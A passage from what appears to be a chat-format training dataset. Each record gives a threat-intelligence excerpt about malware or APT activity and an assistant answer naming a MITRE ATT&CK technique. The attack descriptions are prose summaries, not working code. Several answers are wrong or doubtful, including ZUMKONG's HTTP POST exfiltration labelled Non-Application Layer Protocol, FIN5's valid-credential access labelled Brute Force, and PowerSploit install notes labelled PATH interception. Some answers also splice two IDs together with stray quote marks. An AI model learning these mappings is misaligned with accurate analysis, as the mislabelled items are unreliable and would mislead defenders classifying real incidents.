- "content": "Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE backdoor. In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The second portion of EnvyScout is a modified version of the open-source tool FileSaver, which is intended to assist in the writing of files to disk via JavaScript. This methodology may circumvent static analysis of known malicious file types by obscuring them within dynamically altered content upon execution"
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "From a code perspective, little has changed between Ryuk binaries compiled in March and those compiled in September. The functionality has remained overall static since introducing features for targeting hosts on a local area network (LAN). The most notable change to Ryuk is the introduction of code obfuscation. The code obfuscations appear to be designed to slow down the reverse engineering process by using anti-disassembly and code transformation obfuscation techniques"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As happens so many times, it contains a Visual Basic script that will execute the malicious activities. This ZIP file contains a Python interpreter and Python script that is actually the RAT. The Word macro will unzip and execute the main script called \"launcher.py. The launcher script is responsible for checking the environment that the doc is currently being opened in. It assumes that all sandboxes will have hard drives smaller than 62GB. If it's in a sandbox environment, it will overwrite the malware scripts with the contents of the file \"License.txt\" and exit, thus deleting itself. Anti-sandbox code If it determines that it is not running in a sandbox environment, it will generate a unique ID, that is then replaced directly with the Python source code of the main scripts before executing it"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Contains two DLL function exports: start and ss2 - Not dropped to the disk - Responsible for terminating processes and stopping/disabling services related to endpoint security - Responsible for file encryption - Responsible for creating multiple worker threads for encryption - Responsible for creating the ransom notes - No longer uses the process rundll32.exe as a loader, but instead uses the MegaCortex binary as the DLL loader - Responsible for deleting volume shadow copies using vssadmin.exe and wiping deleted data from all drives using cipher.exe"
- },
- {
- "role": "assistant",
- "content": "T1561.001 - Disk Content Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After downloading the executable payload, the secondary VBScript runs the following command on the command line (T1059) to kill any existing msiexec.exe process instances and use the ping application to sleep for two seconds before using the legitimate msiexec.exe application (T1218) to launch the downloaded PlayerVLC.msi file"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuietSieve has the ability to execute payloads in a hidden window."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobian RAT uses DNS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Honeybee, the threat actors used a Visual Basic script embedded within a Word document to download an implant."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Note: DLL side loading is a prevalent persistence technique that is used to launch a multitude of backdoors"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "*Command_Create&Inject: This command creates a new process (using a supplied filename as the process name) and then injects malicious code into it"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used and modified open-source tools like Impacket, Mimikatz, and pwdump."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can use launch agents for persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Executive: looks for a file with commands and executes them with cmd.exe. The output is saved to a file."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USBStealer drops itself onto removable media and relies on Autorun to execute the malicious file when a user opens the removable media on another system."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used a script to attempt RPC authentication against a number of hosts."
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT19 has obtained and used publicly-available tools like Empire."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can interact with a victim’s Outlook session and look through folders and emails."
- },
- {
- "role": "assistant",
- "content": "T1114.001 - Email Collection: Local Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 3: CVE-2017-11882 and POWRUNER attack sequence The malicious .rtf file exploits CVE-2017-11882"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FireEye has dubbed the cybercrime gang FIN5. One of the most unique things about FIN5 is that in every intrusion we responded to where FIN5 has been active, legitimate access was identified. They had valid user credentials to remotely log into the network,\" said Barry Vengerik, principal threat analyst at FireEye. No sexy zero-days, no remote exploits -- not even spearphishing"
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloads additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To set up persistence, the loader creates a folder named “c:\\temp”, sets its attributes to be a hidden and system folder to hide the folder from view in Windows Explorer"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While the URI string has changed from Trickbot and Anchor variants, the phishing tactics and use of post-infection reconnaissance commands remains the same. In the Bazar backdoor, the tag (or gtag) used to identify Trickbot campaigns is removed from C2 URIs. It may have been moved to the cookie HTTP header parameter"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kazuar stages command output and collected data in files before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can capture and compress stolen credentials from the Registry and volume shadow copies."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of obtaining directory, file, and drive listings."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used social media platforms, including LinkedIn and Twitter, to send spearphishing messages."
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects data from the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum can identify proxy servers configured and used by the victim, and use it to make HTTP requests to C2 its server."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has 2 methods for elevating integrity. It can bypass UAC through eventvwr.exe and sdclt.exe."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "C2 traffic can communicate via TCP raw sockets."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Backdoor.Pirpi also collects information about the target’s local network, including the domain controller and workstations"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has stolen Chrome browser cookies by copying the Chrome profile directories of targeted users."
- },
- {
- "role": "assistant",
- "content": "T1539 - Steal Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has used external remote services such as virtual private networks (VPN) to gain initial access."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used an instrumentor script to gather the names of all services running on a victim's system."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup. also has the capability to invoke a reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has sent data and files to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT19 configured its payload to inject into the rundll32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The next program sent to victims enumerates all the drives on the infected system and executes the following command on them"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "With these outputs, FIN6 was able to identify user accounts that could access additional hosts in the domain"
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page."
- },
- {
- "role": "assistant",
- "content": "T1185 - Browser Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Encrypting the data. Exfiltrating gathered data through a POST request or by uploading it to an FTP server. Sending execution logs to a remote server"
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Historically, the group has employed the use of a series of phishing origin points, abusing access first at one university and then another"
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak used legitimate programs such as AmmyyAdmin and Team Viewer for remote interactive C2 to target systems."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can also perform pass-the-ticket."
- },
- {
- "role": "assistant",
- "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JHUHUGIT has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SHARPSTATS has used base64 encoding and XOR to obfuscate PowerShell scripts."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "credential stealer ZUMKONG emails credentials from the victim using HTTP POST requests."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To achieve privilege escalation within the environment, FIN6 utilized a named pipe impersonation technique included within the Metasploit framework that allows for SYSTEM-level privilege escalation"
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "injects DLL files into iexplore.exe."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has used tools including BITSAdmin to test internet connectivity from compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork has signed malware with self-signed certificates from fictitious and spoofed legitimate software companies."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "injects its DLL component into svchost.exe."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather a list of processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMess can identify the computer name of a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable"
- },
- {
- "role": "assistant",
- "content": "T1574.007 - Path Interception by PATH Environment Variable"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. After a few minutes, execute the malicious file on the system. Use malware to upload the large list of enumerated files to the C2 server. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity"
- },
- {
- "role": "assistant",
- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These events will run respectively at 15:30:40 and when the system uptime is between 300 and 400 seconds. The variable $HL39fjh contains the base64-encoded PowerShell command shown in Figure 2. It reads the Windows Registry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the payload"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As noted, there are two distinct variants of ServHelper: a “tunnel” variant and a “downloader” variant. The “downloader” variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader"
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has sent spearphishing emails containing a link to a document that contained malicious macros or took the victim to an actor-controlled domain."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HTTPBrowser is capable of capturing keystrokes on victims."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tonto Team has downloaded malicious DLLs which served as a ShadowPad loader."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WINERACK can enumerate processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TG-3390 uses DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL. CTU researchers have observed the threat actors employing legitimate Kaspersky antivirus variants in analyzed samples. The DLL acts as a stub loader, which loads and executes the shell code. The adversaries have used this technique to allow PlugX and HttpBrowser to persist on a system"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs account discovery using commands such as net localgroup administrators and net group \"REDACTED\" /domain on specific permissions groups."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These PowerShell scripts are final stage payloads – they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities. hUpdateCheckers.ps1 (POWRUNER) The backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception has used specific malware modules to gather domain membership."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The size of the PuTTY binary downloaded by the victim is also substantially larger than the legitimate version. Upon closer inspection, it has a large, high entropy .data section in comparison to the officially distributed version (Figure 3). Sections like these are typically indicative of packed or encrypted data."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used appcmd.exe to disable logging on a victim server."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
